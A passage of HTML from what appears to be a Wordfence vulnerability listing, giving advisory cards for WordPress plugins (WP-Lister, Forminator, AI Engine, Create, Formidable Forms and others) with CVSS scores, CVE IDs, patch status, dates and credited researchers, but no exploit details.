					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-90887" target="_blank" rel="noopener noreferrer">							CVE-2026-90887						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-inventory-manager" target="_blank" rel="noopener">WP Inventory Manager</a> <span class="wfvr-software-slug">[wp-inventory-manager]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/arya-prasetyo" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4c713783cef57ea8eeef5b9a8f58c34b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4c713783cef57ea8eeef5b9a8f58c34b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/arya-prasetyo" target="_blank" rel="noopener">sorawautsukushiii</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4f537db6-52d1-4606-af19-e72930a6ece4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fe3302c0-4817-459e-a6f6-d5ead9c29fed" target="_blank" rel="noopener">WP-Lister Lite for eBay &lt;= 3.8.9 &#8211; Unauthenticated Stored Cross-Site Scripting via AJAX Cron Handler Request</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18595" target="_blank" rel="noopener noreferrer">							CVE-2026-18595						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-lister-for-ebay" target="_blank" rel="noopener">WP-Lister Lite for eBay</a> <span class="wfvr-software-slug">[wp-lister-for-ebay]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thevietronin" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d2de85470fb8bc914ee4f18ea34d49db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d2de85470fb8bc914ee4f18ea34d49db"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/thevietronin" target="_blank" rel="noopener">thevietronin</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fe3302c0-4817-459e-a6f6-d5ead9c29fed" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/17f4b7c7-0a4b-41e0-9e31-252a17fd40df" target="_blank" rel="noopener">WPLP Cookie Consent &lt;= 4.4.3 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-85130" target="_blank" rel="noopener noreferrer">							CVE-2026-85130						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gdpr-cookie-consent" target="_blank" rel="noopener">WPLP Cookie Consent – Cookie Banner &amp; Consent Management for GDPR, CCPA &amp; Google Consent Mode</a> <span class="wfvr-software-slug">[gdpr-cookie-consent]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b83998e318a17b004dfe1f66689a2125.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b83998e318a17b004dfe1f66689a2125"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener">Karthik Ramakrishnan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/17f4b7c7-0a4b-41e0-9e31-252a17fd40df" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/eb597253-77a3-476f-92e4-4c5029fd5c64" target="_blank" rel="noopener">YouTube Embed – YouTube Gallery, Vimeo Gallery – WordPress Plugin 10.0 &#8211; 10.3 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-88793" target="_blank" rel="noopener noreferrer">							CVE-2026-88793						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/youram-youtube-embed" target="_blank" rel="noopener">YouTube Embed – YouTube Gallery, Vimeo Gallery – WordPress Plugin</a> <span class="wfvr-software-slug">[youram-youtube-embed]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/adem0n" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/189db1733c87d0f400ae8929c36bf3d2.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="189db1733c87d0f400ae8929c36bf3d2"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/adem0n" target="_blank" rel="noopener">Adem0n__</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/eb597253-77a3-476f-92e4-4c5029fd5c64" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/74f53eb4-299f-438a-8eb5-bf1ede31a915" target="_blank" rel="noopener">Forminator Forms &lt;= 1.57.2.0 &#8211; Authenticated (Admin+) PHP Object Injection</a></h4>
<div class="cvss-score-badge">6.6</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.6 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87067" target="_blank" rel="noopener noreferrer">							CVE-2026-87067						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/forminator" target="_blank" rel="noopener">Forminator Forms – Contact Form, Payment Form &amp; Custom Form Builder</a> <span class="wfvr-software-slug">[forminator]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b83998e318a17b004dfe1f66689a2125.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b83998e318a17b004dfe1f66689a2125"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener">Karthik Ramakrishnan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/74f53eb4-299f-438a-8eb5-bf1ede31a915" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2cb2ad5d-aa92-4186-aaae-45dde4a52f30" target="_blank" rel="noopener">AI Engine &lt;= 3.7.7 &#8211; Insecure Direct Object Reference to Authenticated (Subscriber+) Sensitive Attachment Disclosure via &#8216;mediaId&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-89141" target="_blank" rel="noopener noreferrer">							CVE-2026-89141						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ai-engine" target="_blank" rel="noopener">AI Engine – The Chatbot, AI Framework &amp; MCP for WordPress</a> <span class="wfvr-software-slug">[ai-engine]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/trung-huynh-chi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/1e1133a510e613ab214627aceaeea121.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="1e1133a510e613ab214627aceaeea121"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/trung-huynh-chi" target="_blank" rel="noopener">Chi Trung Huynh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2cb2ad5d-aa92-4186-aaae-45dde4a52f30" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b3243fe4-9d11-49f0-884b-0162cd776993" target="_blank" rel="noopener">Better Messages &lt;= 2.15.33 &#8211; Missing Authorization to Authenticated (Custom+) Chat-Room Transcript Disclosure via &#8216;/thread/&lt;id&gt;&#8217; REST Endpoint</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-89334" target="_blank" rel="noopener noreferrer">							CVE-2026-89334						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bp-better-messages" target="_blank" rel="noopener">Better Messages – Chat Rooms, Group Chat, Private Messages &amp; AI Chat Bots</a> <span class="wfvr-software-slug">[bp-better-messages]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/supakiad-s" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2be53568b04545bf9e036c375a3d44d9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2be53568b04545bf9e036c375a3d44d9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/supakiad-s" target="_blank" rel="noopener">Supakiad S. (m3ez)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b3243fe4-9d11-49f0-884b-0162cd776993" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/46fa99f1-9152-4130-a5b1-2ea10032069b" target="_blank" rel="noopener">Create &lt;= 2.5.3 &#8211; Authenticated (Author+) SQL Injection via &#8216;order_by&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13191" target="_blank" rel="noopener noreferrer">							CVE-2026-13191						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mediavine-create" target="_blank" rel="noopener">Create</a> <span class="wfvr-software-slug">[mediavine-create]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/46fa99f1-9152-4130-a5b1-2ea10032069b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9279e01d-53b8-4816-b405-0db2f984cb5a" target="_blank" rel="noopener">Create &lt;= 2.5.3 &#8211; Authenticated (Author+) SQL Injection via &#8216;order&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13200" target="_blank" rel="noopener noreferrer">							CVE-2026-13200						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mediavine-create" target="_blank" rel="noopener">Create</a> <span class="wfvr-software-slug">[mediavine-create]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9279e01d-53b8-4816-b405-0db2f984cb5a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ce924708-935a-45c0-8959-dd122632cef4" target="_blank" rel="noopener">Custom Field Template &lt;= 2.7.8 &#8211; Authenticated (Contributor+) SQL Injection via &#8216;post_ID&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-9855" target="_blank" rel="noopener noreferrer">							CVE-2026-9855						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/custom-field-template" target="_blank" rel="noopener">Custom Field Template</a> <span class="wfvr-software-slug">[custom-field-template]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luc-huynh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/33af58759a2231f0c6ffdafd84ba15df.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="33af58759a2231f0c6ffdafd84ba15df"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/luc-huynh" target="_blank" rel="noopener">Luc Huynh from Noventiq RedTeam</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ce924708-935a-45c0-8959-dd122632cef4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/61831b3e-4b2a-4fce-8fa2-818aa9991bb2" target="_blank" rel="noopener">Divi Essentials &lt;= 5.8.1 &#8211; Missing Authorization to Authenticated (Subscriber+) Sensitive Information Disclosure via dnxte_get_database_data AJAX Action</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15760" target="_blank" rel="noopener noreferrer">							CVE-2026-15760						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/divi-essential" target="_blank" rel="noopener">Divi Essentials</a> <span class="wfvr-software-slug">[divi-essential]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xd4rk5id3" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2a1b4c1c638eb4f66b0677e71058a830.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2a1b4c1c638eb4f66b0677e71058a830"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xd4rk5id3" target="_blank" rel="noopener">0xd4rk5id3</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/61831b3e-4b2a-4fce-8fa2-818aa9991bb2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4eca64cc-75c2-46ba-a086-15a952a20026" target="_blank" rel="noopener">Download Manager &lt;= 3.3.68 &#8211; Insecure Direct Object Reference to Authenticated (Contributor+) Sensitive Information Disclosure via &#8216;wpdm_duplicate&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-92714" target="_blank" rel="noopener noreferrer">							CVE-2026-92714						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/download-manager" target="_blank" rel="noopener">Download Manager</a> <span class="wfvr-software-slug">[download-manager]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pbsec" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7f4bd9017dada52c54654420190e89ba.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7f4bd9017dada52c54654420190e89ba"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pbsec" target="_blank" rel="noopener">pb&gt;sec</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4eca64cc-75c2-46ba-a086-15a952a20026" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6b9322d5-afa0-4f38-b5df-2344310f4119" target="_blank" rel="noopener">Easy Appointments &lt;= 3.12.27 &#8211; Missing Authorization to Authenticated (Contributor+) Sensitive Customer Information Exposure via ea_get_customers_ajax AJAX Action</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-9232" target="_blank" rel="noopener noreferrer">							CVE-2026-9232						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-appointments" target="_blank" rel="noopener">Easy Appointments</a> <span class="wfvr-software-slug">[easy-appointments]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ryoma-nishioka-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b19e3ab80ec15ac158dc093a41425376.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b19e3ab80ec15ac158dc093a41425376"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ryoma-nishioka-2" target="_blank" rel="noopener">Ryoma Nishioka</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6b9322d5-afa0-4f38-b5df-2344310f4119" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e5f4dfc6-6094-46ee-9901-61a0d9ed8c99" target="_blank" rel="noopener">Formidable Forms &lt;= 6.34 &#8211; Unauthenticated Arbitrary Shortcode Execution</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19857" target="_blank" rel="noopener noreferrer">							CVE-2026-19857						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/formidable" target="_blank" rel="noopener">Formidable Forms – WordPress Form Builder for Contact Forms, Calculators, Quizzes &amp; More</a> <span class="wfvr-software-slug">[formidable]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e5f4dfc6-6094-46ee-9901-61a0d9ed8c99" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
